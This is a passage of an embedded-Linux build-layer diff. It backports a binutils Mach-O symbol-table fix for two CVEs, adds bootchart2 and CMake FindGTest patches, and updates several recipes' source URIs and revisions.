1From d12f8998d2d086f0a6606589e5aedb7147e6f2f1 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Fri, 14 Oct 2022 10:30:21 +1030
4Subject: [PATCH] PR29677, Field `the_bfd` of `asymbol` is uninitialised
5
6Besides not initialising the_bfd of synthetic symbols, counting
7symbols when sizing didn't match symbols created if there were any
8dynsyms named "". We don't want synthetic symbols without names
9anyway, so get rid of them. Also, simplify and correct sanity checks.
10
11 PR 29677
12 * mach-o.c (bfd_mach_o_get_synthetic_symtab): Rewrite.
13---
14Upstream-Status: Backport from [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=d12f8998d2d086f0a6606589e5aedb7147e6f2f1]
15CVE: CVE-2023-25588
16CVE: CVE-2022-47696
17
18Signed-off-by: Ashish Sharma <asharma@mvista.com>
19Signed-off-by: poojitha adireddy <pooadire@cisco.com>
20
21 bfd/mach-o.c | 72 ++++++++++++++++++++++------------------------------
22 1 file changed, 31 insertions(+), 41 deletions(-)
23
24diff --git a/bfd/mach-o.c b/bfd/mach-o.c
25index acb35e7f0c6..5279343768c 100644
26--- a/bfd/mach-o.c
27+++ b/bfd/mach-o.c
28@@ -938,11 +938,9 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
29 bfd_mach_o_symtab_command *symtab = mdata->symtab;
30 asymbol *s;
31 char * s_start;
32- char * s_end;
33 unsigned long count, i, j, n;
34 size_t size;
35 char *names;
36- char *nul_name;
37 const char stub [] = "$stub";
38
39 *ret = NULL;
40@@ -955,27 +953,27 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
41 /* We need to allocate a bfd symbol for every indirect symbol and to
42 allocate the memory for its name. */
43 count = dysymtab->nindirectsyms;
44- size = count * sizeof (asymbol) + 1;
45-
46+ size = 0;
47 for (j = 0; j < count; j++)
48 {
49- const char * strng;
50 unsigned int isym = dysymtab->indirect_syms[j];
51+ const char *str;
52
53 /* Some indirect symbols are anonymous. */
54- if (isym < symtab->nsyms && (strng = symtab->symbols[isym].symbol.name))
55- /* PR 17512: file: f5b8eeba. */
56- size += strnlen (strng, symtab->strsize - (strng - symtab->strtab)) + sizeof (stub);
57+ if (isym < symtab->nsyms
58+ && (str = symtab->symbols[isym].symbol.name) != NULL)
59+ {
60+ /* PR 17512: file: f5b8eeba. */
61+ size += strnlen (str, symtab->strsize - (str - symtab->strtab));
62+ size += sizeof (stub);
63+ }
64 }
65
66- s_start = bfd_malloc (size);
67+ s_start = bfd_malloc (size + count * sizeof (asymbol));
68 s = *ret = (asymbol *) s_start;
69 if (s == NULL)
70 return -1;
71 names = (char *) (s + count);
72- nul_name = names;
73- *names++ = 0;
74- s_end = s_start + size;
75
76 n = 0;
77 for (i = 0; i < mdata->nsects; i++)
78@@ -997,47 +995,39 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
79 entry_size = bfd_mach_o_section_get_entry_size (abfd, sec);
80
81 /* PR 17512: file: 08e15eec. */
82- if (first >= count || last >= count || first > last)
83+ if (first >= count || last > count || first > last)
84 goto fail;
85
86 for (j = first; j < last; j++)
87 {
88 unsigned int isym = dysymtab->indirect_syms[j];
89-
90- /* PR 17512: file: 04d64d9b. */
91- if (((char *) s) + sizeof (* s) > s_end)
92- goto fail;
93-
94- s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
95- s->section = sec->bfdsection;
96- s->value = addr - sec->addr;
97- s->udata.p = NULL;
98+ const char *str;
99+ size_t len;
100
101 if (isym < symtab->nsyms
102- && symtab->symbols[isym].symbol.name)
103+ && (str = symtab->symbols[isym].symbol.name) != NULL)
104 {
105- const char *sym = symtab->symbols[isym].symbol.name;
106- size_t len;
107-
108- s->name = names;
109- len = strlen (sym);
110- /* PR 17512: file: 47dfd4d2. */
111- if (names + len >= s_end)
112+ /* PR 17512: file: 04d64d9b. */
113+ if (n >= count)
114 goto fail;
115- memcpy (names, sym, len);
116- names += len;
117- /* PR 17512: file: 18f340a4. */
118- if (names + sizeof (stub) >= s_end)
119+ len = strnlen (str, symtab->strsize - (str - symtab->strtab));
120+ /* PR 17512: file: 47dfd4d2, 18f340a4. */
121+ if (size < len + sizeof (stub))
122 goto fail;
123- memcpy (names, stub, sizeof (stub));
124- names += sizeof (stub);
125+ memcpy (names, str, len);
126+ memcpy (names + len, stub, sizeof (stub));
127+ s->name = names;
128+ names += len + sizeof (stub);
129+ size -= len + sizeof (stub);
130+ s->the_bfd = symtab->symbols[isym].symbol.the_bfd;
131+ s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
132+ s->section = sec->bfdsection;
133+ s->value = addr - sec->addr;
134+ s->udata.p = NULL;
135+ s++;
136+ n++;
137 }
138- else
139- s->name = nul_name;
140-
141 addr += entry_size;
142- s++;
143- n++;
144 }
145 break;
146 default:
147--
1482.39.3
149
diff --git a/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
new file mode 100644
index 0000000000..3cb8a3c2a2
--- /dev/null
+++ b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
@@ -0,0 +1,68 @@
1From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001
2From: Mingli Yu <mingli.yu@windriver.com>
3Date: Fri, 5 Nov 2021 11:18:07 +0800
4Subject: [PATCH] bootchartd.in: make sure only one bootchartd process
5
6When boot with "init=/sbin/bootchartd" as below:
7 # runqemu qemux86 bootparams="init=/sbin/bootchartd"
8
9There are two bootchartd process after boot [1].
10 # ps -ef | grep bootchart
11root 101 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
12root 103 101 8 03:27 ? 00:00:02 /lib64/bootchart/bootchart-collector 50
13root 106 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
14root 792 106 0 03:27 ? 00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000
15root 794 725 0 03:27 ttyS0 00:00:00 grep bootchart
16
17 # /sbin/bootchartd stop
18[bootchart] bootchart-collector started as pid 596 with 2 args:
19[bootchart] '--dump'
20[bootchart] '/tmp/bootchart.3lXpVDAq3v'
21[bootchart] Extracting profile data from pid 204
22[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000'
23[bootchart] read 135168 bytes of 135168
24[bootchart] reading 150 chunks (of 150) ...
25[bootchart] wrote 18760 kbB
26[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit
27
28But there still one process exist after the above stop command finish.
29 # ps -ef | grep bootchartd
30root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd
31root 629 516 0 09:10 ? 00:00:00 grep bootchartd
32
33Remove the wait_boot which used to wait the boot process to finish to
34make sure only one bootchartd process and meanwhile we don't need the
35wait_boot logic because we either use "/sbin/bootchartd stop" to stop
36the bootchartd manually or install package bootchartd-stop-initscript
37altogether with bootchart2 to stop bootchartd automatically after boot.
38
39After patch:
40 # ps -ef | grep bootchart
41 root 101 1 0 03:36 ? 00:00:00 /bin/sh /sbin/bootchartd
42 root 103 101 6 03:36 ? 00:00:04 /lib64/bootchart/bootchart-collector 50
43 root 596 592 0 03:37 ttyS0 00:00:00 grep bootchart
44
45[1] https://github.com/xrmx/bootchart/issues/94
46
47Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95]
48
49Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
50---
51 bootchartd.in | 1 -
52 1 file changed, 1 deletion(-)
53
54diff --git a/bootchartd.in b/bootchartd.in
55index 7979ef9..f0e466d 100755
56--- a/bootchartd.in
57+++ b/bootchartd.in
58@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then
59 else # running inside the main system
60 echo "bootchart: no initrd used; starting"
61 start &
62- wait_boot &
63 # wait a little, until the collector is going, before allowing
64 # the rest of the system to charge ahead, so we catch it
65 $USLEEP 250000
66--
672.17.1
68
diff --git a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
index a938b2da49..7f05bd1b0b 100644
--- a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb
+++ b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
@@ -90,15 +90,15 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124"
90 90
91UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)" 91UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)"
92 92
93SRC_URI = "git://github.com/xrmx/bootchart.git \ 93SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \
94 file://bootchartd_stop.sh \ 94 file://bootchartd_stop.sh \
95 file://0001-collector-Allocate-space-on-heap-for-chunks.patch \ 95 file://0001-collector-Allocate-space-on-heap-for-chunks.patch \
96 file://0001-bootchart2-support-usrmerge.patch \ 96 file://0001-bootchart2-support-usrmerge.patch \
97 file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \
97 " 98 "
98 99
99S = "${WORKDIR}/git" 100S = "${WORKDIR}/git"
100SRCREV = "331ada031f1d65f6d934d918f896e1c708c64bf7" 101SRCREV = "868a2afab9da34f32c007d773b77253c93104636"
101PV .= "+git${SRCPV}"
102 102
103inherit systemd update-rc.d python3native update-alternatives 103inherit systemd update-rc.d python3native update-alternatives
104 104
@@ -144,7 +144,7 @@ do_install () {
144 144
145PACKAGES =+ "pybootchartgui" 145PACKAGES =+ "pybootchartgui"
146FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui" 146FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui"
147RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-shell python3-compression python3-codecs" 147RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-math python3-shell python3-compression python3-codecs"
148RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}" 148RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}"
149RDEPENDS_${PN}_class-target += "lsb-release" 149RDEPENDS_${PN}_class-target += "lsb-release"
150DEPENDS_append_class-native = " python3-pycairo-native" 150DEPENDS_append_class-native = " python3-pycairo-native"
diff --git a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
index 4112cf484f..be61916cc6 100644
--- a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
+++ b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
@@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev"
15RDEPENDS_${PN} = "libgcc" 15RDEPENDS_${PN} = "libgcc"
16 16
17SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334" 17SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334"
18SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \ 18SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \
19 file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \ 19 file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \
20 " 20 "
21 21
diff --git a/meta/recipes-devtools/build-compare/build-compare_git.bb b/meta/recipes-devtools/build-compare/build-compare_git.bb
index b0560cc277..6afa9a0d68 100644
--- a/meta/recipes-devtools/build-compare/build-compare_git.bb
+++ b/meta/recipes-devtools/build-compare/build-compare_git.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare"
5LICENSE = "GPLv2" 5LICENSE = "GPLv2"
6LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" 6LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
7 7
8SRC_URI = "git://github.com/openSUSE/build-compare.git \ 8SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \
9 file://Ignore-DWARF-sections.patch;striplevel=1 \ 9 file://Ignore-DWARF-sections.patch;striplevel=1 \
10 " 10 "
11 11
diff --git a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
index c08da6cdca..cd2ca8dbe9 100644
--- a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
+++ b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
@@ -3,6 +3,7 @@
3# Released under the MIT license (see packages/COPYING) 3# Released under the MIT license (see packages/COPYING)
4SUMMARY = "A set of tools for CD recording, including cdrecord" 4SUMMARY = "A set of tools for CD recording, including cdrecord"
5HOMEPAGE = "http://sourceforge.net/projects/cdrtools/" 5HOMEPAGE = "http://sourceforge.net/projects/cdrtools/"
6DESCRIPTION = "cdrecord tool is Highly portable CD/DVD/BluRay command line recording software."
6SECTION = "console/utils" 7SECTION = "console/utils"
7LICENSE = "GPLv2 & CDDL-1.0 & LGPLv2.1+" 8LICENSE = "GPLv2 & CDDL-1.0 & LGPLv2.1+"
8LIC_FILES_CHKSUM = "file://COPYING;md5=32f68170be424c2cd64804337726b312" 9LIC_FILES_CHKSUM = "file://COPYING;md5=32f68170be424c2cd64804337726b312"
diff --git a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
index b2952ee5f5..96a7be6770 100644
--- a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
+++ b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
@@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \
7 file://environment.d-cmake.sh \ 7 file://environment.d-cmake.sh \
8 file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \ 8 file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \
9 file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \ 9 file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \
10 file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \
10 " 11 "
11 12
12 13
diff --git a/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
new file mode 100644
index 0000000000..267f586a71
--- /dev/null
+++ b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
@@ -0,0 +1,255 @@
1From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001
2From: Eero Aaltonen <eero.aaltonen@iki.fi>
3Date: Sun, 17 Oct 2021 17:13:07 +0300
4Subject: [PATCH] FindGTest: Add target for gmock library
5
6`googlemock` has been absorbed into the
7[googletest](https://github.com/google/googletest) project and is built
8and installed from the same source tree.
9
10As GTest may be built with or without GMock, skip GMock if it is not
11present.
12
13Do not provide result variables for GMock. They are not provided by
14upstream GTest's CMake Package Configuration File.
15
16Also update the test case to cover linking to `GTest::gmock`.
17
18The patch was imported from the Kitware git server
19(git@gitlab.kitware.com:cmake/cmake.git) as of commit id
2050bf457a0dd857cf976b22c5be7d333493233d1e
21
22Patch was modified to support upper case variable `GTEST_FOUND`.
23
24Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632]
25Milestone: 3.23.0
26
27Signed-off-by: Eero Aaltonen <eero.aaltonen@vaisala.com>
28---
29 .../dev/FindGTest-target-for-gmock.rst | 4 +
30 Modules/FindGTest.cmake | 133 +++++++++++++++---
31 Tests/FindGTest/Test/CMakeLists.txt | 4 +
32 3 files changed, 121 insertions(+), 20 deletions(-)
33 create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst
34
35diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst
36new file mode 100644
37index 0000000000..f78242c80e
38--- /dev/null
39+++ b/Help/release/dev/FindGTest-target-for-gmock.rst
40@@ -0,0 +1,4 @@
41+FindGTest-target-for-gmock
42+--------------------------
43+
44+* The :module:`FindGTest` module now provides a target for GMock, if found.
45diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake
46index e015a9840f..0331049594 100644
47--- a/Modules/FindGTest.cmake
48+++ b/Modules/FindGTest.cmake
49@@ -7,10 +7,23 @@ FindGTest
50
51 Locate the Google C++ Testing Framework.
52
53+.. versionadded:: 3.20
54+ Upstream ``GTestConfig.cmake`` is used if possible.
55+
56 Imported targets
57 ^^^^^^^^^^^^^^^^
58
59-This module defines the following :prop_tgt:`IMPORTED` targets:
60+ This module defines the following :prop_tgt:`IMPORTED` targets:
61+
62+``GTest::gtest``
63+ The Google Test ``gtest`` library, if found; adds Thread::Thread
64+ automatically
65+``GTest::gtest_main``
66+ The Google Test ``gtest_main`` library, if found
67+
68+.. deprecated:: 3.20
69+ For backwards compatibility, this module defines additionally the
70+ following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5):
71
72 ``GTest::GTest``
73 The Google Test ``gtest`` library, if found; adds Thread::Thread
74@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets:
75 ``GTest::Main``
76 The Google Test ``gtest_main`` library, if found
77
78-
79 Result variables
80 ^^^^^^^^^^^^^^^^
81
82@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config)
83 endif()
84 endfunction()
85
86+function(__gtest_define_backwards_compatible_library_targets)
87+ set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE)
88+
89+ # Add targets mapping the same library names as defined in
90+ # older versions of CMake's FindGTest
91+ if(NOT TARGET GTest::GTest)
92+ add_library(GTest::GTest INTERFACE IMPORTED)
93+ target_link_libraries(GTest::GTest INTERFACE GTest::gtest)
94+ endif()
95+ if(NOT TARGET GTest::Main)
96+ add_library(GTest::Main INTERFACE IMPORTED)
97+ target_link_libraries(GTest::Main INTERFACE GTest::gtest_main)
98+ endif()
99+endfunction()
100+
101 #
102
103+include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
104+
105+# first specifically look for the CMake version of GTest
106+find_package(GTest QUIET NO_MODULE)
107+
108+# if we found the GTest cmake package then we are done, and
109+# can print what we found and return.
110+if(GTest_FOUND)
111+ set(GTEST_FOUND ${GTest_FOUND})
112+ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE)
113+
114+ set(GTEST_LIBRARIES GTest::gtest)
115+ set(GTEST_MAIN_LIBRARIES GTest::gtest_main)
116+
117+ __gtest_define_backwards_compatible_library_targets()
118+
119+ return()
120+endif()
121+
122 if(NOT DEFINED GTEST_MSVC_SEARCH)
123 set(GTEST_MSVC_SEARCH MD)
124 endif()
125@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD")
126 __gtest_find_library(GTEST_LIBRARY_DEBUG gtest-mdd gtestd)
127 __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main-md gtest_main)
128 __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind)
129+ __gtest_find_library(GMOCK_LIBRARY gmock-md gmock)
130+ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmock-mdd gmockd)
131+ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main-md gmock_main)
132+ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind)
133 else()
134 __gtest_find_library(GTEST_LIBRARY gtest)
135 __gtest_find_library(GTEST_LIBRARY_DEBUG gtestd)
136 __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main)
137 __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind)
138+ __gtest_find_library(GMOCK_LIBRARY gmock)
139+ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmockd)
140+ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main)
141+ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind)
142 endif()
143
144-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
145 FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY)
146
147-if(GTEST_FOUND)
148+if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY)
149+ set(GMock_FOUND True)
150+else()
151+ set(GMock_FOUND False)
152+endif()
153+
154+if(GTest_FOUND)
155 set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR})
156 __gtest_append_debugs(GTEST_LIBRARIES GTEST_LIBRARY)
157 __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY)
158- set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES})
159
160 find_package(Threads QUIET)
161
162- if(NOT TARGET GTest::GTest)
163+ if(NOT TARGET GTest::gtest)
164 __gtest_determine_library_type(GTEST_LIBRARY)
165- add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED)
166+ add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED)
167 if(TARGET Threads::Threads)
168- set_target_properties(GTest::GTest PROPERTIES
169+ set_target_properties(GTest::gtest PROPERTIES
170 INTERFACE_LINK_LIBRARIES Threads::Threads)
171 endif()
172 if(GTEST_LIBRARY_TYPE STREQUAL "SHARED")
173- set_target_properties(GTest::GTest PROPERTIES
174+ set_target_properties(GTest::gtest PROPERTIES
175 INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1")
176 endif()
177 if(GTEST_INCLUDE_DIRS)
178- set_target_properties(GTest::GTest PROPERTIES
179+ set_target_properties(GTest::gtest PROPERTIES
180 INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
181 endif()
182- __gtest_import_library(GTest::GTest GTEST_LIBRARY "")
183- __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE")
184- __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG")
185+ __gtest_import_library(GTest::gtest GTEST_LIBRARY "")
186+ __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE")
187+ __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG")
188 endif()
189- if(NOT TARGET GTest::Main)
190+ if(NOT TARGET GTest::gtest_main)
191 __gtest_determine_library_type(GTEST_MAIN_LIBRARY)
192- add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
193- set_target_properties(GTest::Main PROPERTIES
194- INTERFACE_LINK_LIBRARIES "GTest::GTest")
195- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "")
196- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE")
197- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG")
198+ add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
199+ set_target_properties(GTest::gtest_main PROPERTIES
200+ INTERFACE_LINK_LIBRARIES "GTest::gtest")
201+ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "")
202+ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE")
203+ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "DEBUG")
204+ endif()
205+
206+ __gtest_define_backwards_compatible_library_targets()
207+endif()
208+
209+if(GMock_FOUND)
210+ if(NOT TARGET GTest::gmock)
211+ __gtest_determine_library_type(GMOCK_LIBRARY)
212+ add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED)
213+ set(_gmock_link_libraries "GTest::gtest")
214+ if(TARGET Threads::Threads)
215+ list(APPEND _gmock_link_libraries Threads::Threads)
216+ endif()
217+ set_target_properties(GTest::gmock PROPERTIES
218+ INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}")
219+ if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED")
220+ set_target_properties(GTest::gmock PROPERTIES
221+ INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1")
222+ endif()
223+ if(GTEST_INCLUDE_DIRS)
224+ set_target_properties(GTest::gmock PROPERTIES
225+ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
226+ endif()
227+ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "")
228+ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE")
229+ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG")
230+ endif()
231+ if(NOT TARGET GTest::gmock_main)
232+ __gtest_determine_library_type(GMOCK_MAIN_LIBRARY)
233+ add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED)
234+ set_target_properties(GTest::gmock_main PROPERTIES
235+ INTERFACE_LINK_LIBRARIES "GTest::gmock")
236+ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "")
237+ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE")
238+ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG")
239 endif()
240 endif()
241diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt
242index b65b9d28f6..7d3a378a65 100644
243--- a/Tests/FindGTest/Test/CMakeLists.txt
244+++ b/Tests/FindGTest/Test/CMakeLists.txt
245@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx)
246 target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS})
247 target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT})
248 add_test(NAME test_gtest_var COMMAND test_gtest_var)
249+
250+add_executable(test_gmock_tgt main.cxx)
251+target_link_libraries(test_gmock_tgt GTest::gmock_main)
252+add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt)
253--
2542.17.1
255
diff --git a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
index 398069eef2..870009c2ba 100644
--- a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
+++ b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
@@ -2,7 +2,6 @@ set( CMAKE_SYSTEM_NAME Linux )
2set( CMAKE_C_FLAGS $ENV{CFLAGS} CACHE STRING "" FORCE ) 2set( CMAKE_C_FLAGS $ENV{CFLAGS} CACHE STRING "" FORCE )
3set( CMAKE_CXX_FLAGS $ENV{CXXFLAGS} CACHE STRING "" FORCE ) 3set( CMAKE_CXX_FLAGS $ENV{CXXFLAGS} CACHE STRING "" FORCE )
4set( CMAKE_ASM_FLAGS ${CMAKE_C_FLAGS} CACHE STRING "" FORCE ) 4set( CMAKE_ASM_FLAGS ${CMAKE_C_FLAGS} CACHE STRING "" FORCE )
5set( CMAKE_LDFLAGS_FLAGS ${CMAKE_CXX_FLAGS} CACHE STRING "" FORCE )
6set( CMAKE_SYSROOT $ENV{OECORE_TARGET_SYSROOT} ) 5set( CMAKE_SYSROOT $ENV{OECORE_TARGET_SYSROOT} )
7 6
8set( CMAKE_FIND_ROOT_PATH $ENV{OECORE_TARGET_SYSROOT} ) 7set( CMAKE_FIND_ROOT_PATH $ENV{OECORE_TARGET_SYSROOT} )
@@ -13,13 +12,13 @@ set( CMAKE_FIND_ROOT_PATH_MODE_PACKAGE ONLY )
13 12
14set(CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX "$ENV{OE_CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX}") 13set(CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX "$ENV{OE_CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX}")
15 14
16# Set CMAKE_SYSTEM_PROCESSOR from the sysroot name (assuming processor-distro-os). 15set( CMAKE_SYSTEM_PROCESSOR $ENV{OECORE_TARGET_ARCH} )
17if ($ENV{SDKTARGETSYSROOT} MATCHES "/sysroots/([a-zA-Z0-9_-]+)-.+-.+")
18 set(CMAKE_SYSTEM_PROCESSOR ${CMAKE_MATCH_1})
19endif()
20 16
21# Include the toolchain configuration subscripts 17# Include the toolchain configuration subscripts
22file( GLOB toolchain_config_files "${CMAKE_TOOLCHAIN_FILE}.d/*.cmake" ) 18file( GLOB toolchain_config_files "${CMAKE_TOOLCHAIN_FILE}.d/*.cmake" )
23foreach(config ${toolchain_config_files}) 19foreach(config ${toolchain_config_files})
24 include(${config}) 20 include(${config})
25endforeach() 21endforeach()
22
23unset(CMAKE_C_IMPLICIT_INCLUDE_DIRECTORIES)
24unset(CMAKE_CXX_IMPLICIT_INCLUDE_DIRECTORIES)
diff --git a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
index c6a53ffece..3c403a4077 100644
